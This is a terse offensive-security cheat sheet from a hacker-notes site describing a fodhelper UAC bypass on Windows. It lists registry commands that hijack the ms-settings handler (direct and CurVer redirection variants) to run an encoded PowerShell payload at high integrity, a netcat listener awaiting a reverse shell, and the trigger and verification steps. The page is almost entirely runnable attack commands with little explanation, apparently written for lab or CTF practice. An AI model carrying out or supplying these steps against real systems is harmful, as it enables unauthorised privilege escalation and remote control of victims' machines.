>_ shadow.red
notatki-hakera.pl YouTube CTF Solutions Channel ☕ Buy me a coffee
~ / Active Directory / fodhelper UAC Bypass (AD context)

fodhelper UAC Bypass (AD context)

Active Directory AD Attacks windows

Direct ms-settings hijack

REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /d "<base64 powershell -enc payload>" /f
REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ
fodhelper.exe
REG query HKCU\Software\Classes\ms-settings\Shell\Open\command

CurVer redirection variant

REG ADD "HKCU\Software\Classes\.thm\Shell\Open\command" /d "<encoded payload>" /f
REG ADD "HKCU\Software\Classes\ms-settings\CurVer" /d ".thm" /f

Listener and trigger

nc -nvlp 443

fodhelper.exe
whoami /all

Look for Mandatory Label showing high integrity.